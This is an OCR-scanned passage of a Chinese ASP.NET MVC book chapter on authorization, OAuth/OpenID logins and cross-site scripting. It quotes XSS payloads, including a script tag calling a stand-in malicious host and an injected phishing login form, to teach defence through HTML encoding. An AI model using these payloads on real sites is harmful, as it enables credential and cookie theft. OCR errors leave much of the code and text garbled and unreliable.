e 通常 情况 下 ， 管 理 角 色 成 员 要 比 管理 用 户 成 员 人 简单 。 如 果 新 座 佣 了 一 个 办 公 室 
管理 员 ， 可 以 在 不 改变 代 但 的 情况 下 轻松 将 他 添加 到 Administrator 角色 中 。 如 末 
在 系统 中 添加 一 个 新 的 管理 用 户 ， 就 需要 改变 所 有 Authorize 特性 ， 并 且 还 要 部 署 
新 版 本 的 应 用 程序 集 ， 这 样 就 贻 笑 大 方 了 。 
e 基于 角色 的 管理 可 以 在 不 同 的 部 闭环 境 中 拥有 不 同 的 访问 列表 。 我 们 可 能 想 在 开 
发 环境 中 授权 给 开发 人 员 对 工资 应 用 程序 的 Administrator 访问 权限 ， 但 在 生产 环 
境 中 不 会 这 样 处 理 。 
当 创 建 角 色 组 时 ， 可 考虑 使 用 基于 特权 的 角色 分 组 。 例如， 名 为 CanAdjustCompensation 
和 CanEditAlbums 的 角色 组 要 比 权 限 过 度 泛 化 的 角色 组 ( 像 Administrator 组 ， 后 面 不 可 避免 
的 会 有 SuperAdmin 组 , 同样 也 不 可 避免 的 会 有 SuperSuperAdmin 组 ) 要 更 精细 , 更 便于 管理 。 


要 获得 上 和 面 讨论 安全 级 别 之 间 交 互 的 一 个 完整 例子 ， 可 以 从 http:/mvcmnusicstore- 
codeplex.com 上 下 载 MVC Music Store 应 用 程序 ， 从 中 可 以 观察 到 StoreController、Checkout- 
Controller 和 StoreManagerController 之 间 的 过 渡 。 这 个 交互 需要 几 个 控制 器 和 一 个 后 备 数 据 库 ， 
因此 ， 下 载 完 整 的 程序 代码 是 最 简单 的 ， 不 必 安 装 NuGet 包 ， 也 不 必 进 行 多 步 配 置 。 


7.3 扩展 角色 和 成 员 


如 前 所 述 ，ASPNET MVC 的 好 处 之 一 就 是 它 运 行 在 成 熟 且 功能 齐全 的 ASPNET 核心 
之 上 。 而 ASPNET MVC 中 的 身份 验证 和 授权 建立 在 System.Web.Security 名 称 空间 中 的 
Role 类 和 Membership 类 之 上。 这样 做 是 有 好 处 的 ， 主 要 有 以 下 几 方 面 的 原因 : 

e 可 使 用 基于 ASPNET Membership 系统 的 现 有 代码 和 技术 。 

e 通过 使 用 ASP.NET Membership 和 Roles 的 API， 可 以 扩展 用 来 处 理 安全 性 问题 的 

ASPNET MVC 组 件 ( 如 授权 和 默认 的 控制 堪 AccountController)。 
e 可 利用 提供 器 系统 创建 目 己 的 Membership、Role 和 Profile 提供 堪 来 配合 ASPNET 
MVC 工作 。 

笔者 最 近 正 在 写 一 篇 扩展 博客 ， 题 目 是 ASPNET MVC Authentication 一 一 Customizing 

Authentication and Authorization The Right Way,， 博客 网 址 : http://bit.ly/CustomizeMvcAuthentication。 


7.4 通过 OAuth 和 OpenlD 的 外 部 登录 


从 以 往来 看 ， 大 多 数 Web 应 用 程序 都 是 基于 本 地 的 账户 数据 库 来 处 理 授权 问题 。 
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ASPNET Membership 系统 便 是 一 个 大 家 所 熟知 的 例子 ,新 用 户 回 系统 提供 用 户 名 、 密 码 和 
其 他 需要 的 信息 来 注册 账号 。 应 用 程序 把 这 些 用 户 信息 添加 到 本 地 的 成 员 数 据 库 ， 然 后 利 
用 数据 库 中 的 用 户 信息 验证 用 户 登 录 。 
虽然 传统 的 成 员 资格 适用 于 大 多 数 Web 应 用 程序 ， 但 是 它 也 带 有 一 些 严 重 的 负面 影响 : 
e ”维护 包含 有 用 户 信 息 和 加 密 口令 的 本 地 数据 库 是 一 项 重大 责任 。 现 在 听 到 那些 涉 
及 到 成 千 上 万 个 用 户 账 户 信息 ( 通 第 包含 未 加 密 的 密码 ) 的 重大 安全 漏洞 , 已 经 是 司 
守 见 惯 的 事情 了 。 更 糟 的 是 ， 由 于 许多 用 户 在 多 个 网 站 都 使 用 同样 的 口令 ， 受 威 
胁 的 账户 可 能 会 影响 到 他 们 在 银行 或 其 他 敏感 网 站 的 账户 安全 。 

e 网 站 注册 非常 麻烦 。 用 户 已 经 厌倦 了 填写 表格 ， 适 用 各 种 不 同 的 密码 规则 ， 记 忆 
密 公 以 及 担心 我 们 的 网 站 是 否 能 够 确保 他 们 的 信息 安 人 全。 因此， 相当 一 部 分 的 潜 
在 用 户 都 选择 不 在 我 们 的 网 站 注册 。 

OAuth 和 OpenID 是 开放 的 授权 标准 。 这 些 协 议 允 许 用 户 使 用 他 们 已 有 的 账户 登录 我 
们 的 网 站 , 这 些 账户 必须 来 目 他 们 信任 的 网 站 ( 称 为 提供 器 ), 如 Google、Twitter 和 Microsoft 
等 其 他 网 站 。 

在 过 去 ， 配 置 网 站 以 支持 OAuth 和 OpenID 是 非常 难 实现 的 ， 原 因 有 如 下 两 点 : 首先 是 
协议 复 荣 ， 然 后 是 顶级 提供 器 对 这 两 种 协议 的 实现 方式 不 一 样 。MVC 4 通过 在 Intemet 项 目 
模板 中 内 置 文 持 OAuth 和 OpenID 极 大 地 简化 了 这 一 点 。 这 种 支持 包括 一 个 更 新 的 Account- 
Controller、 便 于 注册 和 账户 管理 的 视图 以 及 构建 在 流行 库 DotNetOpenAuth 之 上 的 工具 类 。 

新 的 登录 页 面 会 出 现 两 个 选项 : “Use a local account to log in” 和 “Use another service to 
log in”， 如 图 7-5 所 示 。 从 图 中 页 面 可 以 看 出 ， 现 在 我 们 的 网 站 文 持 两 个 选项 。 如 果 用 户 
愿意 ， 他 们 可 以 继续 创建 本 地 账户 。 


| Log in. 


| Use a local account to log in. Use another service to log in. 


User 而 下 站 | 到 
There are no wermal suthentication services 
= Wis for details on settling 


up this ASP.NET appheation to support loggmng mn 
Password Wa extemal services. 


: -一 
中 厂 Remember me? 
Log in 


Regster tf you dont have an acoounit. 


I dia - My BSP MET MV ApPICHtOn 
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7.4.1 注册 外 部 登录 提供 器 


我 们 需要 显示 地 局 用 外 部 网 站 ， 以 便利 用 它们 的 账户 登录 我 们 的 网 站 。 可 喜 的 是 ， 这 
个 操作 非常 简单 。 我 们 可 以 在 App StartAuthConfig.cs 中 配置 授权 提供 程序 。 当 创建 新 的 
应 用 程序 时 ，AuthConfig.cs 中 的 所 有 验证 提供 器 都 会 注释 掉 ， 并 会 出 现 如 下 形式 : 
public static class AuthcContfig 
{ 
public static void RegisterAuth() 
{ 
// To let users of this site log in using their accounts from 
// other sites such as Microsoft, Facebook, and Twitter, 
// you must update this site. For more information wisit 
/ http://go.microsoft.com/fwlink/?LinkID=252166 


//OMAuUthWebSecurity.RegisterMicrosoftClient( 
/i clientId: ™™, 
:i clientSecret: ™"); 


//OMAUthWebSecurity.RegisterTwitterClientl( 
/i consumerKey: ™", 
/i consumerSecret: ™");} 


//OAuthWebSecurity.RegisterFacebookClient ( 
// appId: "", 
/1 appSecret: ™"); 


/ /OMAuUthWebSecurity.RegisterGoogleClient () ; 
} 


使 用 OAuth 提供 器 的 网 站 (如 Facebook、Twitter 和 Microsoft 等 ) 要 求 我 们 把 网 站 注册 
为 一 个 应 用 程序 。 这 样 它们 就 会 提供 给 我 们 一 个 客户 端 id 和 一 个 口令 。 我 们 利用 OAuth 
提供 器 根据 这 些 信 息 就 可 以 进行 验证 。 利 用 OpenID( 如 Google 和 Yahoo) 的 网 站 不 需要 注 
册 应 用 程序 ， 我 们 也 不 需要 客户 端 id 和 口令 。 

尽管 上 面 罗列 的 OAuthWebSecurity 方法 隐藏 OAuth 和 OpenID 之 间 的 区 别 以 及 提供 器 
之 间 的 差异 非常 困难 , 但 是 我 们 需要 注意 一 些 不 同 之 处 。 提 供 器 使 用 的 术语 有 差别 , 例如 ， 
把 客户 端 id 称 为 消费 者 键 、 应 用 程序 id 等 。 壮 运 的 是 , 对 于 每 个 提供 器 , OAuthWebSecurity 
方法 使 用 的 参数 名 称 与 提供 器 的 木 语 和 文档 一 致 。 
7.4.2 配置 OpenlD 提供 希 

由 于 不 用 注册 ， 不 用 填写 参数 ， 因 此 配置 OpenID 提供 需 是 非常 简单 的 。 下 面 我 们 为 
三 个 OpenID 提供 器 (Google、Yahoo 和 myoOpenID) 添 加 OpenID 文 持 。 

实现 支持 Google 提供 器 的 示例 代码 包含 在 了 AuthConfig 中 ， 因 此 只 需要 取消 对 它 的 
注释 。 要 添加 对 Yahoo 的 支持 ， 只 和 需 调 用 OAuthWebSecurity.RegisterYahooClient0 方 法 。 
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由 于 OAuthWebSecurity 类 不 能 直接 用 于 注册 myOpenID， 因 此 我 们 需要 创建 注册 一 个 
目 定 义 的 客户 端 ， 如 下 面 完整 的 AuthConfig.cs 代码 所 示 ( 注 意 ， 传 统 方法 都 是 通过 using 语 
句 来 引入 DotNetOpenAnuth 名 称 空间 )。 


uSing DotNetOpenAuth.AspNet.Clients; 
USing DotNetoOpenAuth.OpenId.RelyingParty; 
USing Microsott .Web .WebPages .OAuth; 


namespace MvycApplication23 


{ 
public static class AuthConfig 
{ 
public static Vold ReglisterAuth{() 
{ 
OAuthWebSecurity.RegisterGoogleClient () ; 
OAuthWebSecurity.RegisterYahooClient ();} 
Var MyOpenIdClient = 
new OpenIdClient ("myopenid", WellknownProviders.MyOpenld); 
OAuthWebSecurity.RegisterClient (MyOpenIlIdClient, "myOpenID", 
null}); 
} 
} 
} 


这 样 编写 代码 后 ,为 了 测试 效果 , 运行 应 用 程序 , 并 在 header 部 分 单 击 Log In 链接 (或 
者 浏览 到 /Account/Login)。 我 们 就 会 看 到 三 个 注册 客户 端 显示 在 外 部 网 站 列表 中 ， 如 图 7-6 
所 示 。 


/Acceunt/ ogmn 


| Use a local account to log in. Use another service to log in. 


User name 6 | | Yal | onenlD 


password | 


: | Raemember me? 


| Log im | 


| 
Begister i you dont have an account : 


| B02 : My SP MET MVC peiErern : 


图 7-6 
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接 下 来 单 击 Google 登录 按钮 。 这 样 就 把 我 们 重 定 问 到 了 Google 认证 页 面 ， 如 图 7-7 
所 示 ， 该 页 面 验证 我 们 想 要 的 信息 (这 里 是 指 email 地 址 )， 而 后 返回 到 请 求 网 站 。 


| Cl 回 | 】 
EN 3 ; mm | | | | 
《于 SIS haps//accounts.googlecoryoyopenidz2/auth PD» BCX “是 Google Accounts | 


ss a 一 


Google accounts 


Localhost is asking for some information from your Google Account fakeaddress@gmail.com 


" Email address- fakeaddress@gmail. com 


| Alow | | Nothanks | 


了 Remember this approval 


Tou can aloays change Your Google Aceounl aporoval settings. Localhost is nol ouned, operaled., or controled by Google or its Owners. Leam 
more 


图 7-7 
单 击 Allow 按钮 后 ,我 们 就 会 被 重 定向 到 ASPNET MVC 网 站 ,来 继续 完成 注册 程序 (如 
图 7-8)。 


Go 


Register. Associate your Google account. 


You've successfully authenticated with Google. Please enter a user name for this Ste below and dick the Confirm button to finish logging in. 


User name 


fakeaddress@gmail.com 


Register | 


® 0L2 = Mhy ASPNET MVC Application 


图 7-8 


单 击 Register 按钮 后 ， 我 们 会 被 作为 一 个 已 认定 的 用 户 重 定 回 到 主页 ， 如 图 7-9 所 示 。 
最 后 单 击 我 们 在 header 中 的 用 户 名 称 来 管理 目 己 的 账户 (如 图 7-10)。 可 以 座 加 一 个 本 
地 密码 或 者 绑 定 额外 的 外 部 登录 提供 需 。 
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4 [Sr DS Ox) emerse-w ast ~ 


Hello, feezddress@ ome.com: lLog of 
Heme About Centact 


| | f ™ 天 人 F 本 |! 1 FE 和  : -| 
ww a 


Home Page. Modify this template to jump-start your ASP.NET MVC 
application. 


We suggest the following: 
E13 Getting Started 
ASP.NET MYC grves you a powertul pattems-based way to build dynamic websites that enables a clean separation of concems and 


hat gives you full control over markup for enjgoyable, pgile development, ASPMNET MVC includes mary foatures that enable fast TOO 
-friendhy development for creating sophistiated applications that use the latest web standards. lem mors,, 


Add NuGet packages sand Jump-start your coding 
NuGet makes N easy bo mstall and Update free lbraries and tools. LEam ore 


Home About 


| Manage Account. 


YOU re logged im as jongalloway Dgmail.com, 
You de net have a local password for this ste. Add a local password so you ean Iog in without an mrtemal login. 


New password 


Confirm new password 


Registered external logins 
Google 
Add an external login 


: 图 7-10 
7.4.3 配置 OAuth 提供 器 
尽管 配置 OAuth 提供 需 需 要 的 代码 和 配置 OpenID 非常 相似 ， 但 是 把 网 站 注册 为 应 用 
程序 的 过 程 会 因 提供 器 而 异 。MVC 4 Internet 项 目 模 板 通过 使 用 DotNetOpenAnuth 的 NuGet 


支持 OAuth。 这 里 笔者 推荐 采用 OAuth 的 官方 文档 ， 而 不 是 引用 打印 材料 或 博客 。 我 们 可 
以 单 击 链接 在 Login 页 面 (在 以 “See this article for details… ”的 语句 中 ) 或 者 在 下 面 的 位 置 
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http://go.microsoft.conmyfwlink/?LinkId=252166 中 的 文章 来 找到 它 。 这 些 文档 教 我 们 使 用 
OAnuth 提供 器 一 步 一 步 注册 应 用 程序 。 

当 过 程 完成 时 ， 提供 器 会 提供 一 个 客户 端 id 和 密 钥 ， 并 且 我 们 可 以 把 它们 正确 地 插入 
到 AuthConfig.cs 中 的 注释 方法 ,例如 , 假设 已 经 注册 了 一 个 Facebook 应 用 程序 , 其 App ID 
为 123456789012，App Secret“abcdefabcdefdecafbad”( 注 意 这 里 只 是 例子 ， 并 未 投入 使 用 )。 
然后 可 使 用 AuthConfig.cs 中 的 如 下 代码 启用 Facebook 验证 : 


public static class AuthConfig 


{ 
public static void ReglisterAuth{() 
{ 
OAuthWwebSecurity.RegisterFacebookClient ( 
applId: "1234567189012", 
appSecret: "abcadefabcaeftaecaftbad ) ; 
} 
} 


7.4.4 外 部 登录 的 安全 性 


尽管 OAuth 和 OpenID 简化 了 安全 性 编码 , 但 它们 也 给 应 用 程序 引入 了 其 他 潜在 的 攻击 
媒介 。 如 果 一 个 提供 器 网 站 被 破坏 ， 或 者 网 站 之 间 的 安全 通信 遭 到 破坏 ， 攻 击 者 可 能 会 暗中 
破坏 我 们 网 站 的 登录 ， 或 者 捕获 用 户 信息 。 因 此 ， 当 使 用 代理 验证 时 ， 必 须 重视 安全 性 问 
题 。 尽管 我 们 使 用 外 部 服务 进行 身份 验证 , 但 是 网 站 安全 问题 仍然 是 我 们 应 该 负 起 的 责任 。 


1. 可 信 的 外 部 登录 提供 器 


通常 使 用 知名 提供 堪 ， 只 文 持 我 们 信任 的 提供 器 , 这 一 点 很 重要 。 下 向 是 两 个 主要 原因 。 

第 一 ， 当 我 们 把 用 户 重 定 回 到 外 部 站 点 时 ， 我 们 震 要 确保 这 些 站 点 不 是 亚 意 的 ， 没 有 
安全 问题 的 网 站 ， 因 为 这 样 的 站 点 可 能 会 泄露 或 误 用 用 户 登 录 数 据 或 其 他 信息 。 

第 二 ， 喘 份 验证 提供 堪 回 我 们 提供 用 户 的 信息 ， 这 些 信息 不 仅仅 是 用 户 的 注册 状态 ， 
还 有 e-mail 地 址 和 其 他 潜在 的 具体 信息 。 如 采 这 些 信息 是 不 正确 的 ， 我 们 就 会 验证 错误 的 
人 ， 或 者 使 用 错误 的 用 户 信 息 。 


2. 要求 SSL 登录 


从 外 部 提供 器 到 我 们 网 站 的 回调 中 包含 拥有 用 户 信 息 的 安全 令 脾 ， 这 些 令 有 牌 允 许 访 问 
我 们 的 网 站 。 当 令 牌 在 Internet 中 传递 时 ， 使 用 HTTPS 传输 是 很 重要 的 ， 因 为 这 样 可 以 防 
止 信息 拦截 。 

为 访问 AccountController 的 Login Get 方法 并 执行 HTTPS， 文 持 外 部 登录 的 应 用 程序 
应 该 使 用 RequireHttps 特性 要 求 使 用 HTTPS。 


/1 
// GET: /Account/Login 
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[RequireHttps] 
[Al lowAnonymous | 
public ActionResult Logijin (string returnUr]l) 
{ 
ViewBag.ReturnUrl = returnUrl; 
return View(); 
} 


在 登录 网 站 期 间 执行 HITPS 会 导致 对 外 部 提供 器 的 所 有 调用 都 在 HITPS 上 传输 。 这 
反 过 来 导致 提供 器 使 用 HTTPS 回调 到 我 们 网 站 。 

此 外 ，Google 验证 和 HITPS 一 起 使 用 是 很 重要 的 。Google 会 通过 HTTP 报告 一 个 登 
录 进 来 的 用 尸 ， 而 后 对 于 两 个 不 同 的 用 户 ， 会 通过 HITPS 报告 。 要 求 使 用 HITPS 就 会 避 
免 这 一 问题 的 发 生 。 


7.5 ”Web 应 用 程序 中 的 安全 回 量 


到 目前 为 止 ， 我 们 着 重 介绍 了 如 何 使 用 安全 特性 来 控制 对 网 站 不 同 区 域 的 访问 。 许 多 
开发 人 员 会 确保 把 正确 的 用 户 名 和 密码 映射 到 Web 应 用 程序 的 合适 部 分 , 这 些 可 以 看 成 是 
他 们 在 Web 应 用 程序 安全 性 方面 的 扩展 。 

然而 , 本 章 一 开始 就 给 出 警告 , 指出 应 用 程序 需要 具有 阻止 用 户 误 用 程序 的 安全 特性 。 
当 Web 应 用 程序 公布 给 公众 用 户 时 ， 尤 其 是 发 布 在 巨大 的 、 匿 名 的 公共 互联 网 中 , 它 很 容 
易 受 到 各 种 攻击 。 因 为 Web 应 用 程序 运行 在 标准 的 、 基 于 文本 的 协议 ( 像 HTTP 和 HTIMIL) 
之 上 ， 所 以 它们 也 特别 容易 受到 自动 攻击 的 伤害 。 

因此 ， 下 面 将 介绍 重点 转移 到 安全 威胁 上 来 ， 本 节 主 要 介绍 黑客 如 何 小 用 应 用 程序 ， 
以 及 针对 这 些 问题 的 应 对 措施 。 


7.5.1 威胁 : 跨 站 脚本 


本 节 首 先 介绍 最 常见 的 攻击 之 一 : 跨 站 脚本 攻击 (XSS)。 本 节 介 绍 了 XSS 的 危害 ， 以 
及 如 何 阻止 器 站 脚本 攻击 。 


1. 威胁 概述 


我 们 之 前 对 这 种 攻击 没有 防范 ， 然 而 可 能 出 于 幸运 ， 没 有 人 进入 我 们 的 银行 账户 。 即 
便 是 最 热心 的 安全 专家 也 可 能 遗漏 这 一 点 。 路 站 脚本 攻击 在 Web 安全 威胁 上 是 排名 第 一 ， 
然而 遗憾 的 是 ， 导 致 XSS 独 狐 的 主要 原因 是 Web 开发 人 员 不 熟悉 这 种 攻击 。 

可 以 使 用 下 面 两 种 方法 来 实现 XSS: 一 种 方法 是 通过 用 户 将 恶意 的 脚本 命令 输入 到 网 
站 中 ， 而 这 些 网 站 又 能 够 接收 “不 干净 ”(unsanitized) 用 户 输入 ， 男 一 种 方法 是 通过 直接 在 
页 面 上 显示 的 用 户 输入 。 第 一 种 情况 称 为 “被 动 注入 ”(Passive Injection)。 在 被 动 注入 中 ， 
用 户 把 “不 干净 ”的 内 容 输 入 到 文本 框 中 ， 并 把 这 些 内 容 保 存 到 数据 库 中 ， 以 后 再 重新 在 
页 面 上 显示 。 第 二 种 方法 称 为 “主动 注入 ”(Active Injection)， 涉 及 的 用 户 把 “不 干净 ”的 
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内 容 输 入 到 文本 框 中 ， 这 些 输入 的 内 容 立 刻 就 会 在 在 屏幕 上 显示 出 来 。 这 两 种 方式 都 会 和 
成 极 大 危害 ， 下 面 首先 介绍 被 动 注入 。 


2. 被 动 注入 


XSS 通过 向 接收 用 户 输入 的 网 站 中 注入 脚本 代码 来 实现 。 一 个 典型 例子 就 是 博客 ， 它 
允许 用 户 提交 自己 的 评论 ， 如 图 7-11 所 示 。 


<-=- ts a gravatar Leave a Comment,... 


Your home on the interwebs (URL, 


[Remember your info? 
Subscribe? 


图 7-11 

如 果 有 博客 ， 我 们 就 会 知道 表单 中 通常 会 有 4 个 文本 输入 元 素 : 姓名 、e-mail 地 址 、 评 论 
和 URL。 类 似 于 这 样 的 表单 会 让 XSS 黑客 焉 沙 三 尺 ， 理 由 有 两 个 一 一 首先 ， 他 们 知道 表单 中 
提交 的 输入 内 容 会 在 站 点 上 显示 ; 其 次 ， 他 们 知道 编码 URL 很 麻烦 ， 并 且 开 发 人 员 一 般 会 把 
这 些 URL 作为 锚 标 记 的 一 部 分 ， 所 以 通常 情况 下 开发 人 员 不 会 对 这 些 内 容 进 行 必 要 检查 。 

可 以 毫 不 夸张 地 讲 ， 黑 客 比 我 们 要 精明 得 多 。 尽 管 他 们 可 能 没有 这 么 聪明 ， 但 是 我 们 
不 妨 这 样 想 一 一 来 增强 我 们 的 防御 警觉 。 

攻击 者 首先 查看 站 点 是 否 对 输入 元 素 上 的 特定 字符 进行 了 编码 。 虽 然 对 评论 字段 和 姓 
名 字段 采取 了 安全 措施 , 但 是 URL 字段 仍然 存在 注入 脚本 的 可 能 性 。 为 了 说 明 这 一 点 ， 我 
们 向 URL 输入 元 素 中 输入 任意 一 个 查询 字符 串 ， 如 图 7-12 所 示 。 


<-- ts a oravatar Great site! Love the ideas here 


Jon Galloway 
jongalloway@gmail com 
No blog! Sorry ‘< 


Remember your info? 
Subscribes 


Submit Comment 


图 7-12 


这 不 是 直接 攻击 ， 只 是 在 URL 中 放 入 了 一 个 “<” 符 号; 如 有 果 对 URL 进行 了 HTML 
编码 ，URL 中 的 “<” 符 号 束 会 被 “&lt” 蔡 换 。 因 此 ， 要 知道 是 否 对 URL 进行 了 HTML 
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编码 ， 只 需要 查看 URL 中 的 “<” 符 与 是 否 奉 换 成 了 “&lt”。 下 面 提 交 评 论 ， 结 果 一 切 正 
常 ， 如 图 7-13 所 示 。 


1 Comment 
leave your own 


Jon Galloway said 
December 13, 2013 
| Great site! Love the ideas here 
图 7-13 
尽管 这 样 看 起 来 没什么 不 妥 之 处 ， 但 是 这 已 经 向 黑客 暗示: 注入 脚本 是 可 能 的 ， 这 里 
没有 针对 输入 URL 的 验证 机 制 , 来 验证 输入 是 否 有 效 。 如 果 查 看 页 面 的 源 代 码 ， 黑 客 们 就 
会 萌生 强烈 的 XSS 攻击 想法 ， 因 为 这 里 “一 马 平 川 "” 没有 对 攻击 设 管 任何 障 但 : 
<a href="No blog! Sorry :<">Bob</a> 
虽然 这 个 危害 看 起 来 并 不 明显 ， 但 从 黑客 角度 看 却 能 造成 很 大 危害 。 巾 URL 字段 输 
入 下 面 内 容 ， 看 看 会 出 现 什 么 情况 : 


"><iframe src="http://haha.juvenilelamepranks.example.com”" height="400" 
width=500/> 


这 行 脚本 会 关闭 不 受 保护 的 销 标 签 ， 并 同时 强制 网 站 加 载 一 个 下 RAME, 如 图 7-14 所 未。 


2 Comiments 


】 HT Galow a doaid I UT OT 
Decwmber 17, 2013 
For 性 了 上 二 


You Have Been 
Hacked. Have a 
Nice Day You Not 


1337 Person. All 
Your Files are 
Belong To Us NUUP 


图 7-14 
如 果 打 算 癌 一 个 网 站 发 起 攻击 ， 这 样 做 是 极其 轧 顾 的 ， 因 为 这 样 会 提醒 网 站 管理 员 修 
补漏 洞 。 如 果 想 成 为 真正 的 隐形 黑客 ， 束 应 该 像 下 面 这 样 : 


"></a><script src="http://srizbitrojan.evil.example.com"></script> <a href=" 
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这 行 脚本 代码 为 了 不 破坏 页 面 流 而 注入 了 一 个 脚本 标签 ， 在 关闭 当前 锚 标 签 的 同时 ， 
打开 了 另 一 个 销 标 签 。 这 才 是 绝顶 聪明 的 做 法 ， 如 图 7-15 所 示 。 


Jason Jones said 
December 13, 2013 


Awesome job guys! 


图 7-15 


这 样 一 来 ， 即 使 将 鼠标 指针 基 停 在 名 称 上 面 ， 也 不 会 看 到 注入 的 脚本 标签 一 一 因为 这 
是 一 个 空 的 销 标 记 ! 当 用 户 访问 网 站 时 ， 这 些 恶 意 的 脚本 将 会 执行 一 些 恶 意 操作 ， 比 如 将 
用 户 的 cookies 或 数据 发 送 到 黑客 目 己 的 网 站 中 。 


3. 主动 注入 


主动 XSS 注入 涉及 用 户 发 送 的 恶意 信息 ， 这 些 信息 并 不 存储 在 数据 库 中 ,而 是 立即 在 
页 面 上 显示 出 来 。 之 所 以 称 之 为 “主动 ”主要 是 因为 用 户 直 接 参 与 攻击 一 一 不 会 作 坐 在 那 
里 等 符 倒 毒 的 用 户 来 上 钧 。 

有 人 可 能 想 知道 ， 这 些 内 容 是 如 何 构 成 攻击 的 呢 ? 用 户 使 用 我 们 的 网 站 作为 涂鸦 填 ， 
随意 地 回 他 们 目 己 弹出 JavaScript 警告， 或 者 随意 地 把 他 们 目 己 重 定 向 到 恶意 站 点 ， 尽 管 
这 些 对 于 用 户 而 言 ， 看 起 来 很 愚 幼 ， 但 是 这 样 做 是 有 绝对 理由 的 。 

下 面 考 虑 几乎 所 有 网 站 都 具有 的 “search this site” 功 能 。 如 果 使 用 站 点 搜索 查找 “Active 
Script mjection”， 大 部 分 站 点 都 会 返回 一 条 关于 得 找 返回 结果 的 消 县 。 图 7-16 展示 了 一 个 
来 自 MSDN 的 查找 页 面 。 

MSDN Search 


active Script njection Search 


Results 1-20 of about 71,000 for active seript injection 国 


How To: Protect From Injection Attacks in ASP.NET Library 
How To: Use Forms Authentication with Aetihve Drectory .. vabdate Input to protect your applicatien from Rating 窗帘 
injection ., Cross-site seriptng. Cross-mte seripting (N55) attacks 一， 
madnmecrosoft comen-uslbrary/e47397 ,asp 


avascnipt - Greasemonkey seript Injection - Stack Overilow Sack Overflow 
Greasemonkey Serlpt injection .. Tm using greasemonkey to Inject a seript into every .. asked, 2 yaars 

|ago. viewed. B79 times. Betive, 1 year ago 

tackeveriow.com/questions/d332913 


Report View Control Cross Srte script Injection Nerosoft Conneat Meroeson Connea 
Raeport View Control Cross Site Script Injection by . hetive .. rvConfigRaeportsTOuch5essionmo < /seript> 
<Berl pt> alert ,- [sj Actrve 
EONMMNECLMTITOSON.COM/ SO Server/. CONnirol-coss-Jie-seript: Injection 

EREATED 623/012 VALIDATIONS 0 WORKEARGQUNDS © COMMENTS © 
MSOl1-055: Imernet Explorer Coorte Data Can Be Exposed or Altered UDoor novwiedoe Base | 


- Explorer CooWie Data Can Be Exposed or Altered Through Script Injection . In the Settings boxw dick 
Disable under Aetive serlpting and Seripting of Java appleis, 
[supportmcrosoft.com/kb/312461 


图 7-16 
通常 情况 下 ， 这 条 消息 不 进行 HTML 编码 。 这 里 的 总 体感 觉 就 是 ， 如 果 用 户 想 目 己 玩 
XSS， 就 随 他 们 。 当 网 站 没有 针对 主动 注入 攻击 建立 防御 时 ， 输 入 下 面 的 文本 内 容 时 ， 问 
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题 束 出 现 了 。 


“<br><br>Please login with the form below before proceed1ing: 

<form action="mybadsite.aspx"><table><tr><td>Login:</td><td> 

<input type=text length=20 name=login></td></tr> 
<tr><td>Password:</td><td><input type=text length=20 name=password> 
</td></tr></table><input type=submit walue=LOGIN></form>" 


实际 上 ， 上 面 的 代码 (可 以 将 其 扩充 修改 ， 进 而 与 搜索 页 面 混合 在 一 起 ) 会 在 搜索 页 面 
上 输出 一 个 登录 表单 ， 并 且 这 个 表单 会 被 提交 到 站 点 外 的 URL。 这 里 创建 了 一 个 网 站 来 演 
示 这 一 弱点 (作者 来 自 Acunetix, 构建 该 站 点 的 目的 是 展示 主动 注入 攻击 的 工作 原理 )， 如 
果 将 上 述 文本 内 容 加 载 到 搜索 表单 中 ， 将 呈现 如 图 7-17 所 示 的 结果 。 


Nacunetix ead 


You searched for 


Phease login with the form below before proceeding: 
Login: 
password:[ | 

LLOGN | 


为 了 不 留 痕迹 ， 黑客 可 能 已 经 在 站 点 的 CSS 和 格式 上 花费 了 大 量 功 夫 , 但 即便 是 像 上 
面 这 样 基 本 的 攻击 都 非常 容易 使 人 上 当 。 如 果 用 户 真 在 这 上 面 犯 糊涂 ， 他 们 就 会 问 攻击 的 
黑客 提供 他 们 的 登录 信息 。 

上 述 攻 击 的 基础 知识 是 我 们 的 “ 老 朋 友 ” 一 一 社会 工程 : 

“ 嘿 1 快 来 看 这 个 很 酷 的 站 点 ! 但 您 必须 注册 一 一 我 们 将 保护 您 的 注册 信息 避免 泄露 


给 公众 .……….” 
链接 如 下 : 


<a href="http://testasp.acunetix.com/Search.asp?tfSearch= <br><br>Please login 
with the form below before proceeding:<formaction="mybadsite.aspx"><table> 
<tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr> 
<td>Password:</td><td><input type=text length=20 name=password></td></tr> 
</table><input type=submit value=LOGIN></form>">look at this cool site with 
naked pictures</a> 


每 天 都 会 有 很 多 人 在 这 个 问题 上 犯 糊涂 。 
4. 阻止 XSS 


下 面 简要 介绍 如 何在 MVC 应 用 程序 中 阻止 跨 站 脚本 攻击 。 
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1) 对 所 有 内 容 进 行 HTML 编码 

大 部 分 情况 下 ， 使 用 简单 的 HIML 编码 就 可 以 避免 XSS 一 一 服务 器 通过 这 个 过 程 将 
HTML 保留 字符 (如 “<” 和 “>”) 奉 换 为 “编码 ” 对 于 ASPNET MVC 而 言 ， 只 再 在 视图 
中 使 用 Html.Encode 或 Html.AttributeEncode 方法 就 可 实现 对 特性 值 的 “ 编 妈 ”替换 。 

如 果 只 从 本 章 学 到 了 一 个 知识 点 ， 那 么 一 定 是 : 页 面 上 的 每 一 点 输出 都 应 该 是 经 过 
HTML 编码 或 HIML 特性 编码 的 。 本 章 前 面 最 早 就 已 经 谈 到 这 一 点 ， 但 是 这 里 再 次 重申 一 
下 : Html.Encode 是 程序 员 最 好 的 “朋友 ”。 


注意 ”使 用 Web Forms 视图 引擎 的 视图 在 显示 信息 时 总 是 使 用 Html.Encode 

方法 编码 。ASPNET 4 HTML Encoding Code Block 语法 使 得 这 一 操作 更 加 简 
单 ， 例 如 下 面 的 语句 : 

< 当 Html .Encode (Model.FirstName) $%> 

可 以 变 得 更 加 简洁 : 

< 告 : Model .FirstName) 和 > 

Razor 视图 引擎 默认 对 输出 内 容 采 用 HTML 编码 ， 所 以 使 用 : 

QModel .FirstName 

显示 的 模型 属性 将 被 进行 HTML 编码 , 而 程序 员 不 需要 做 任何 其 他 工作 。 

对 于 已 经 “净化 ”或 来 自信 任 数 据 源 (比如 我 们 自己 ) 的 数据 ， 我 们 可 以 
使 用 HTML 辅助 方法 输出 : 

@Htm]l .Raw (Model .HtmlContent) 

想 了 解 更 多 关于 Html.Encode 和 HTML Encoding Code Blocks 的 内 容 ， 请 
参阅 第 3 章 。 


